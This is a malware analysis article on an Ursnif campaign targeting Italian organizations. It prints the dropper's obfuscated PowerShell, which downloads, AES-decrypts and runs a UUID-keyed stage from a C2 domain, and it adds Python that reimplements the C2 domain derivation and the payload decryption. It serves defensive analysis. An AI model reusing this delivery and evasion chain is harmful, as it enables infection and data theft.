A Brand New Ursnif/ISFB Campaign Targets Italian Organizations

Pierluigi Paganini April 17, 2020

Cybaze-Yoroi ZLab researchers spotted a new variant of Ursnif that is targeting organizations in Italy.

Introduction

Ursnif is one of the most active and widespread threats; it is delivered through malspam campaigns aimed at multiple industries across Italy and Europe.

Recently, we have identified a new variant that is targeting Italian organizations. The malspam messages use attachments with subjects like “Avviso di Pagamento_xxxx_date”, where xxxx is a number and date is a date in day-month-year order (e.g. “Avviso di Pagamento_14326_15_04_2020”). We spotted some major changes in the techniques employed by the Ursnif/ISFB droppers used in the campaign: the operators have adopted new techniques to avoid detection and have introduced important changes in the Ursnif infection chain.

Technical Analysis

The variant used in the campaign against Italian organizations contains some important “upgrades” compared with other samples of the Ursnif malware family and a significant evolution of the attack chain. First of all, the dropper uses Excel 4.0 macros (XLM macros) in an attempt to make detection by AVs harder; then it uses two different C2 servers, one of which is used only to register the victim machine, identified by a UUID.

The following picture reports the Ursnif Infection chain that is used in this campaign:

Figure 1: Ursnif Infection Chain

Macro from the Past  

This brand new Ursnif Italian campaign is delivered as a malicious email attachment with an XLM macro embedded into it. The static information of the dropper follows:

Hash: 5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394
Threat: Ursnif XLS document dropper
Size: 39.0 KB (39,936 bytes)
Filetype: MS Excel Spreadsheet
Brief Description: Ursnif XLS document dropper with malicious XLM macros embedded into it
Ssdeep: 768:Deb3eTlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0LzX74bTPuQ:DeaTlYkEIbSkKBEqEXPgsRZmbaoFhZhq

Table 1. Sample information

Once opened, the document looks like an invoice ready to be filled in and displays a “Visualizza” (“View”) button to lure the victim into clicking on it. Clicking the button starts the malicious infection chain designed to compromise the target machine.

Figure 2: Overview of the document

Even if the document is structurally similar to other ones used to spread the malware in past malspam campaigns, its content stands out.

The security notice informs us that the document contains dynamic content; a deeper inspection revealed the presence of embedded Excel 4.0 macros (XLM macros).

Figure 3: Piece of the malicious XLM Macro

The dynamic content is PowerShell code, split across multiple cells and then evaluated by a defined handler:

Figure: Evidence of the Executed code

The Frame1_Layout handler is triggered when the user clicks on “Allow Content”. 

Then the malicious macro is reassembled and the document displays a window telling the user that the document is corrupted. When the user clicks on it, the macro kills the Excel process, but the PowerShell continues its execution in the background.

The extracted macro is the Ursnif dropper; after reassembling it, it looks like this:

sal uu New-Object; &( ([stRING]$VErBoSePRefErENce)[1,3]+'X'-JoIN'') ( uu io.compRESSiON.defLaTEstrEaM([system.Io.meMoRysTrEaM] [conVerT]::FROMbASE64StriNG( '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' ),[iO.ComPrESsIOn.CoMPreSSioNmodE]::DEcOmPreSS )| fOReACH-ObjECT{ uu iO.StReamrEadeR( $_ ,[teXT.EnCODing]::AsCIi ) } |FoReACh-OBjecT{$_.READTOEnD() } )

Code snippet 1

After decoding the Base64 and inflating the Deflate stream, the next layer looks like this:

$lk64bE= [type]("{3}{7}{8}{2}{4}{11}{1}{6}{5}{10}{0}{9}" -F 'RitH','OgrAP','URi','S','Ty.C','As','hY.H','YST','Em.sEc','M','HALgO','Rypt') ; &("{1}{0}"-f 'et','S') 1S7 ( [TyPe]("{3}{1}{2}{0}" -F 'eNCOdING','TeX','t.','SysTEM.') ) ; $9Sk2Z =[TyPE]("{1}{0}" -f 'egEx','r');${IK`oL`OS}=0;Function T`h([String] ${Hy},${G`h}="MD5"){${Hh}=.('uu') ("{0}{1}{4}{5}{3}{2}" -f'S','ystem.Text.Stri','er','ld','n','gBui'); $lK64BE::("{2}{1}{0}" -f 'e','reat','C').Invoke(${GH})."cOMp`UTEhA`SH"( ( .("{0}{2}{3}{1}"-f'G','E','et-v','ArIaBL') 1S7 ).VAlUE::"uT`F8".("{1}{0}{2}"-f'etByt','G','es').Invoke(${H`Y}))|.('%'){[Void]${h`H}.("{0}{1}"-f'App','end').Invoke(${_}.("{0}{1}" -f'ToSt','ring').Invoke("x2"))};${HH}.("{0}{1}" -f 'ToS','tring').Invoke()};function Ht([string] ${E`E}){do{${U}=-join((97..122)|&("{1}{0}{2}"-f 'et-Rando','G','m') -Count 3|.('%'){[char]${_}})}while((&('th')(${U})) -notlike '*'+${e`e});return ${U}};${x`D}=("{2}{1}{0}" -f 't','adswif','uplo');${h`z}='ass';${Q}=2;${di}='pw';function Ts(${IJ}){${T`iK}=${IJ};if(${t`IK} -match 2){${Xd}=${H`z};${d`i}=''};${B`I}= $9SK2Z::("{1}{0}"-f 'eplace','r').Invoke(${t`Ik},'\d',${x`D});if(&("{2}{4}{1}{0}{3}" -f 'ecti','onn','T','on','est-C') (${BI}+${D`I}) -Count 1 -quiet){${bi}=''+'ht'+'tp'+("{1}{0}"-f'/','s:/')+${bi}+${dI}+'/'+${B`i}.("{1}{2}{0}"-f'ring','Sub','st').Invoke(${q}, ${Q})}else{${b`I}=${q}};return ${B`i}};${e}=@(("{0}{1}"-f'new1','.'),'');function k`N{${LP}='2al'+(&('ht')(("{0}{1}" -f '*','6e1d')))+("{1}{0}" -f '.','ail')+(.('ht')(("{1}{0}"-f 'b','*95f')));return .('ts')(${Lp})};${X`q}=.('tS')(${E}[0]);if(${x`Q} -eq ${Q}){${X`Q}=&('Kn')};${y}=.('uu') ("{1}{0}{2}" -f'bC','Net.We','lient');${y}."He`AdeRs".("{1}{0}"-f'dd','A').Invoke(("{0}{1}{2}" -f 'Us','er-A','gent'), (("{16}{0}{24}{32}{7}{9}{31}{1}{20}{6}{22}{4}{5}{30}{8}{17}{25}{29}{21}{11}{13}{26}{15}{3}{10}{18}{28}{19}{12}{23}{27}{14}{2}"-f 'ozi','64; x64) AppleW','62','8.102 ','7.','36 (','it/5','0 (','H','Window','Saf','Ge','7','c','183','hrome/70.0.353','M','T','ari','3','ebK',' ','3','.36 Edge/','lla/','ML, ','ko) C','18.','/5','like','K','s NT 10.0; Win','5.')));${y}.("{4}{0}{3}{1}{2}"-f'own','stri','ng','load','D').Invoke(${Xq})|.( ([String]''."ReM`o`Ve")[45,12,27]-Join'')

Code Snippet 2

The dropper relies on Base64 encoding of a Deflate-compressed stream, format-string reassembly (the -f operator applied to sequences of “{n}” placeholders, which reorders pre-split string fragments), backticks inserted inside identifiers and method names, and random capitalization (mixed upper and lower case). None of this changes what the code does; it only defeats signature matching on the script text.

Once the macro is executed, the dropper contacts the newuploadswift[.]pw domain to download the next-stage payload and runs it through the PowerShell engine. The downloaded stage looks like this:

&((gV '*MDr*').nAme[3,11,2]-JOiN'')( uu IO.strEaMREaDeR(( uu io.comPRESSiON.DeflATeSTrEaM([SYStEM.io.MeMORysTrEAM][cONVert]::FrOmBASe64STRinG( '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'), [iO.COmPREsSioN.coMprEssIOnmoDe]::dEcoMPrEss )) , [TexT.EncOdINg]::asciI) ).ReADtoenD( )

Code snippet 3

After de-obfuscating it, the PowerShell becomes:

function SDfiwe(${T`T}){${T`hL}=[regex]::("{2}{0}{1}"-f 'epl','ace','r').Invoke(${tt},'\d','');return ${t`hl}};function YwE(${T`e}){${i`I}=[Convert]::("{0}{3}{2}{4}{1}" -f'F','tring','e64','romBas','S').Invoke(${t`E});return ${Ii}};&("{1}{0}"-f'l','sa') Vu new-object;${l`LA}=$(&("{0}{2}{3}{1}"-f'get-','object','wm','i') Win32_ComputerSystemProduct -computername . | &("{0}{2}{1}"-f'Select-','ject','Ob') -ExpandProperty UUID);${a`Zq}=${ENV`:tE`mP};${f`Bf}=(${d}=&("{0}{1}" -f'gc','i') ${a`zq}|&("{1}{0}{2}"-f 'd','get-ran','om'))."na`mE" -replace ".{5}$";${M`K}=(&("{1}{0}"-f 'i','Gc') -path (((${A`zQ}.("{0}{2}{1}" -f 'to','ring','st').Invoke()))) | &("{2}{3}{0}{1}"-f 'e-Obj','ect','W','her') { ${_}."pSis`cON`TAiner" }|.("{2}{1}{0}"-f 'lect','e','s') fullname |.("{1}{0}{2}"-f'ndo','Get-Ra','m') -count 1)."FulLn`A`Me"+'\'+${f`BF}+'.';function NiLL(${T`yO}){${k`j}=.('Vu') IO.MemoryStream(,${t`yO});${m`m}=(.('Vu') IO.StreamReader(&('Vu') IO.Compression.GzipStream(${k`J},[IO.Compression.CompressionMode]::"d`ECO`mPrESs"))).("{1}{2}{0}"-f 'nd','ReadT','oE').Invoke();return ${M`M}};&("{0}{1}" -f 's','al') msq regsvr32;${S`U}='using System;using System.Security.Cryptography;using System.Text;public class Af{public static byte[] mol(byte[] kk, string lj){byte[] jik = new UTF8Encoding().GetBytes(lj);Aes AESImplementation = Aes.Create("AES");AESImplementation.Key = jik;AESImplementation.Mode = CipherMode.ECB;ICryptoTransform CryptoTransform = AESImplementation.CreateDecryptor();return CryptoTransform.TransformFinalBlock(kk, 0, kk.Length);}public static byte[] cer(string kk, string lj){return mol(Convert.FromBase64String(kk), lj);}public static string fte(byte[] kk, string lj){return new UTF8Encoding().GetString(mol(kk, lj));}public static string fte(string kk, string lj){return new UTF8Encoding().GetString(cer(kk, lj));}}';.("{0}{1}"-f'A','dd-Type') -TypeDefinition ${su};function osi{${M}=${x`Q}+${q}+'?'+${L`LA};.('Sv') 8 ${m};&('SV') t0L ("{2}{3}{0}{1}"-f 'ie','nt','Net','.WebCl');.('Si') Variable:B (&('Vu') (&("{0}{1}" -f 'I','tem') Variable:\t0L)."v`ALUe");.('Sv') D ("{2}{0}{1}" -f'adDa','ta','Downlo');${f`DS}=(([byte[]](&('Gv') B -Value).((&('LS') Variable:D)."Va`LUE")."IN`VOke"((&('GI') Variable:8)."vAL`Ue")));return &("{0}{1}"-f 'Ni','LL')(${F`ds})};function kelv{${Fd}=&("{1}{0}" -f 'i','os');${fd}=[Af]::("{1}{0}"-f'e','ft').Invoke(${Fd},${l`lA}.("{2}{0}{1}"-f'ubstrin','g','s').Invoke(0,16));${U}=${FD}.("{1}{2}{0}" -f 'tring','su','bs').Invoke(0,1);${e`F}=${F`D}.("{1}{0}"-f 'emove','r').Invoke(0,1);${O`O}=${e`F} -split'!';${vr}=[Text.Encoding]::"Ut`F8";foreach(${O} in ${oO}[0]){${o`UT}=@();${O`A}=${U}.("{0}{1}{2}"-f'ToCharArr','a','y').Invoke();${o}=&("{1}{0}" -f 'wE','Y')(${O});for(${I}=0; ${i} -lt ${O}."c`oUnT"; ${I}++){${o`Ut} += [char]([Byte]${O}[${i}] -bxor[Byte]${OA}[${I}%${o`A}."COU`NT"])}};${SS}=${e`F}."rep`lA`ce"((${o`O}[0]+"!"),${v`R}."gE`TSTr`i`NG"(${O`UT}));return ${SS}};function gb{${k`I}=&("{1}{0}"-f'lv','ke');[io.file]::("{0}{2}{1}"-f'Write','tes','AllBy').Invoke(${m`K},(.("{1}{0}" -f 'E','Yw')(${ki} -replace ".{200}$")));if((&("{1}{0}"-f 'ci','g') ${mk})."Len`GtH" -lt 512){exit};&("{0}{1}"-f'ms','q') -s ${mK};.("{0}{1}" -f'sle','ep') 15;.('sl');[io.file]::("{2}{1}{0}" -f'ines','llL','WriteA').Invoke(${m`k},(&("{1}{0}"-f'Dfiwe','S')(${l`LA})))};&('gb')

Code Snippet 4

At this point it is worth highlighting a trick the malware uses to make each infection unique on the machine: in the previous code snippet, the script reads the machine UUID (the Win32_ComputerSystemProduct UUID, queried through WMI) and passes it to the same C2 as a parameter of the next GET request. If the same UUID is presented a second time, the server replies with an empty body; if the UUID is seen for the first time, the server returns the next stage of the infection, as shown in the following figure.
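The URL that carries the UUID is not hard-coded: the Ts, Ht and kN functions of Code Snippet 2 derive the host at run time, and osi in Code Snippet 4 appends the stage number and the UUID. The Python below is an added example reimplementing that derivation, not code from the original analysis or from the malware. The constant names are mine, the UUID in the demo is made up, and the fallback enumeration is my reading of Ht, which draws three distinct random letters until the MD5 of the string ends with a fixed suffix; enumerating the candidates shows every token that loop can stop at.

```python
import hashlib
from itertools import permutations
from string import ascii_lowercase

# Values taken from Code Snippet 2; the Python names are mine.
SEED = "new1."                 # ${e}[0]
DIGIT_FILLER = "uploadswift"   # ${xD}: substituted for every digit of the seed
ALT_FILLER = "ass"             # ${hz}: used instead when the seed contains a "2"
TLD = "pw"                     # ${di}
STAGE = 2                      # ${Q}


def md5_hex(s):
    return hashlib.md5(s.encode("ascii")).hexdigest()


def derive_host(seed):
    """Ts(): replace each digit with a filler word and append the TLD; a seed containing a
    "2" switches to the alternate filler and drops the TLD. Returns (host, stage_url).
    The script keeps the URL only if Test-Connection reaches the host; otherwise it returns
    2 and the caller falls back to the seeds produced by fallback_seeds()."""
    filler, tld = (ALT_FILLER, "") if "2" in seed else (DIGIT_FILLER, TLD)
    body = "".join(filler if ch.isdigit() else ch for ch in seed)
    host = body + tld
    return host, "https://%s/%s" % (host, body[STAGE:STAGE + 2])


def md5_suffix_tokens(suffix):
    """Ht(): all strings of 3 distinct lowercase letters whose MD5 ends with `suffix`.
    An empty list means the random loop in the script would never terminate."""
    return ["".join(p) for p in permutations(ascii_lowercase, 3)
            if md5_hex("".join(p)).endswith(suffix)]


def fallback_seeds():
    """kN(): '2al' + Ht('*6e1d') + 'ail.' + Ht('*95fb'); each result is then fed to Ts()."""
    return ["2al" + a + "ail." + b
            for a in md5_suffix_tokens("6e1d") for b in md5_suffix_tokens("95fb")]


def beacon_url(stage_url, machine_uuid):
    """osi() in Code Snippet 4: <stage url><STAGE>?<UUID>. The UUID is what lets the C2
    serve the payload once and answer any repeat with an empty body."""
    return stage_url + str(STAGE) + "?" + machine_uuid


if __name__ == "__main__":
    host, url = derive_host(SEED)
    print("primary :", host.replace(".", "[.]"), url.replace(".", "[.]"))
    for seed in fallback_seeds():
        print("fallback:", derive_host(seed)[0].replace(".", "[.]"))
    # constructed UUID, not one observed in the wild
    print("beacon  :", beacon_url(url, "12345678-ABCD-EF01-2345-6789ABCDEF01").replace(".", "[.]"))
```

The derived primary host matches the domain named above, which confirms the reading of Ts. Because the fallback hosts are fixed by the two MD5 suffixes rather than by a date or a seed from the C2, the whole candidate set can be blocked ahead of time.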

Figure 4: Piece of the encrypted DLL downloaded from the DropURL

As seen in the previous figure, the body of the response is encrypted. It is decrypted by the AES routine shown in Code Snippet 4 (the Af class), keyed with the first 16 characters of the machine UUID, written to a file inside a random subfolder of %TEMP% and then executed through the “regsvr32.exe” process. Fifteen seconds after launching regsvr32, the script overwrites the dropped file with the digit-stripped UUID (function SDfiwe), so the loader DLL does not remain on disk in its original form.
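To reproduce the decryption offline, the following Python is an added example (not the malware's C# class and not code from the original analysis) that follows Code Snippet 4 step by step: gunzip, Base64-decode, AES-128-ECB-decrypt with the first 16 characters of the WMI UUID as key, patch the XOR-encoded prefix before the first “!”, drop the last 200 characters and Base64-decode what remains. AES is implemented inline so the script has no dependencies; the wrap_stage encoder, the UUID and the 770-byte fake DLL are constructed only so there is something to run against and say nothing about the real C2's output.

```python
import base64
import gzip

def gmul(a, b):
    """Multiply in GF(2^8) modulo the AES polynomial 0x11B."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = (a << 1) ^ (0x11B if a & 0x80 else 0)
        b >>= 1
    return r

_rotl = lambda x, n: ((x << n) | (x >> (8 - n))) & 0xFF
_xor = lambda a, b: [x ^ y for x, y in zip(a, b)]

# S-box derived from its definition (GF inverse, then the FIPS-197 affine map) instead of 256 pasted constants.
_INV = [0] + [next(b for b in range(1, 256) if gmul(a, b) == 1) for a in range(1, 256)]
SBOX = [b ^ _rotl(b, 1) ^ _rotl(b, 2) ^ _rotl(b, 3) ^ _rotl(b, 4) ^ 0x63 for b in _INV]
INV_SBOX = [SBOX.index(i) for i in range(256)]
MIX = [[2, 3, 1, 1], [1, 2, 3, 1], [1, 1, 2, 3], [3, 1, 1, 2]]
INV_MIX = [[14, 11, 13, 9], [9, 14, 11, 13], [13, 9, 14, 11], [11, 13, 9, 14]]

def expand_key(key):
    """AES-128 key schedule: 16 key bytes -> 11 round keys of 16 bytes."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = w[i - 1][:]
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= rcon
            rcon = gmul(rcon, 2)
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]

def _shift(s, d):  # ShiftRows (d=1) / InvShiftRows (d=-1); state is column-major, s[4*c + r]
    return [s[4 * ((c + d * r) % 4) + r] for c in range(4) for r in range(4)]

def _mix(s, m):  # (Inv)MixColumns: multiply every column by matrix m
    return [gmul(s[4 * c], m[r][0]) ^ gmul(s[4 * c + 1], m[r][1]) ^
            gmul(s[4 * c + 2], m[r][2]) ^ gmul(s[4 * c + 3], m[r][3])
            for c in range(4) for r in range(4)]

def encrypt_block(rk, block):
    s = _xor(block, rk[0])
    for rnd in range(1, 10):
        s = _xor(_mix(_shift([SBOX[b] for b in s], 1), MIX), rk[rnd])
    return bytes(_xor(_shift([SBOX[b] for b in s], 1), rk[10]))

def decrypt_block(rk, block):
    s = _xor(block, rk[10])
    for rnd in range(9, 0, -1):
        s = _mix(_xor([INV_SBOX[b] for b in _shift(s, -1)], rk[rnd]), INV_MIX)
    return bytes(_xor([INV_SBOX[b] for b in _shift(s, -1)], rk[0]))

def aes_ecb_decrypt(key, data):
    """ECB with PKCS7 padding stripped: the defaults of the .NET Aes object used by class Af."""
    rk = expand_key(key)
    pt = b"".join(decrypt_block(rk, data[i:i + 16]) for i in range(0, len(data), 16))
    return pt[:-pt[-1]]

def aes_ecb_encrypt(key, data):  # needed only to build the constructed sample below
    rk = expand_key(key)
    data += bytes([16 - len(data) % 16]) * (16 - len(data) % 16)
    return b"".join(encrypt_block(rk, data[i:i + 16]) for i in range(0, len(data), 16))

def unwrap_stage(plain):
    """kelv() + gb(): character 0 is a one-byte XOR key; the Base64 run before the first '!' is
    decoded, XORed with it and substituted back; drop the last 200 characters, Base64-decode the rest."""
    key, rest = ord(plain[0]), plain[1:]
    head = rest.split("!")[0]
    patched = bytes(b ^ key for b in base64.b64decode(head)).decode("utf-8")
    return base64.b64decode(rest.replace(head + "!", patched)[:-200])

def decrypt_response(body, machine_uuid):
    """One C2 response: gunzip -> Base64 -> AES-128-ECB keyed with UUID[:16] -> unwrap_stage()."""
    text = gzip.decompress(body).decode("utf-8")
    key = machine_uuid[:16].encode("utf-8")
    dll = unwrap_stage(aes_ecb_decrypt(key, base64.b64decode(text)).decode("utf-8"))
    if len(dll) < 512:  # gb() exits silently here; raising makes the failure visible
        raise ValueError("payload shorter than 512 bytes")
    return dll

def wrap_stage(dll, machine_uuid, xor_key="k"):  # inverse of decrypt_response, for the sample only
    b64 = base64.b64encode(dll).decode("ascii")
    enc_head = base64.b64encode(bytes(ord(c) ^ ord(xor_key) for c in b64[:12])).decode("ascii")
    plain = xor_key + enc_head + "!" + b64[12:] + "J" * 200
    ct = aes_ecb_encrypt(machine_uuid[:16].encode("utf-8"), plain.encode("utf-8"))
    return gzip.compress(base64.b64encode(ct))

# Constructed inputs (not from the campaign): a made-up UUID and a 770-byte stand-in for the DLL.
SAMPLE_UUID = "12345678-ABCD-EF01-2345-6789ABCDEF01"
SAMPLE_DLL = b"MZ" + bytes(range(256)) * 3

if __name__ == "__main__":
    print(decrypt_response(wrap_stage(SAMPLE_DLL, SAMPLE_UUID), SAMPLE_UUID) == SAMPLE_DLL)
```

For a real capture, replace the wrap_stage call with the raw HTTP response body and pass the UUID of the infected host; without that UUID the response cannot be decrypted, which is the point of keying the stage on it. The AES core is checked against the FIPS-197 Appendix C test vector.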

The Loader

The payload is as follows:

Hash: e32c592819d825851bae84a33bf5fa1a26e0a57a14c0e4b8c3e845c1117998a0
Threat: Ursnif Loader
Size: 289.50 KB (296,448 bytes)
Filetype: DLL
Brief Description: Ursnif loader, able to inject the payload in memory
Ssdeep: 6144:ydLG0cc+HXn8zAzaFVqG9aldc3w0QBA8Ys36cMsu+a:y5GjsEzaKG4XcLs3isu+a
Imphash: f11ff0b8c499af0d98f00299b97339cf

Table 2. Sample information

This component is the loader for the Ursnif payload. As a persistence mechanism, it writes the following registry key under “HKCU\Software\AppDataLow\Software\Microsoft\Microsoft\[RANDOMID]”:

Figure 5: Registry key evidence

As in classic Ursnif infections, it sends the configuration string to the C2 Serpent-encrypted and Base64-encoded. There are two ways to retrieve the configuration string: decrypt it from the request sent to the C2 using the Serpent key extracted from process memory, or look for the plaintext configuration string inside the process memory. In the end, the configuration of this Ursnif campaign is the following:

k=kjrisau&soft=1&version=214131&user=92bdf642cd2b24f71ccbae351ccb9aa9&server=12&id=4444&crc=ef267149&uptime=12089&ip=*.*.*.*

Conclusion

With our previous analyses we tracked the evolution of Ursnif TTPs over time. Some of the techniques used by the malware are evolving rapidly, especially in the direction of evasion and anti-analysis.

This Italian campaign, while keeping the characteristics and capabilities of recent ones, uses XLM macros to lower AV detection rates and two different C2 servers, one of which is dedicated to tracking each infection through a unique UUID. This mechanism lets the operators better track the return on investment of the malicious campaign.

Additional details, including Indicators of Compromise (IoCs) and Yara rules, are reported in the analysis published by ZLab.

https://yoroi.company/research/a-brand-new-ursnif-isfb-campaign-targets-italian-organizations/


Pierluigi Paganini

(SecurityAffairs – Ursnif, malware)
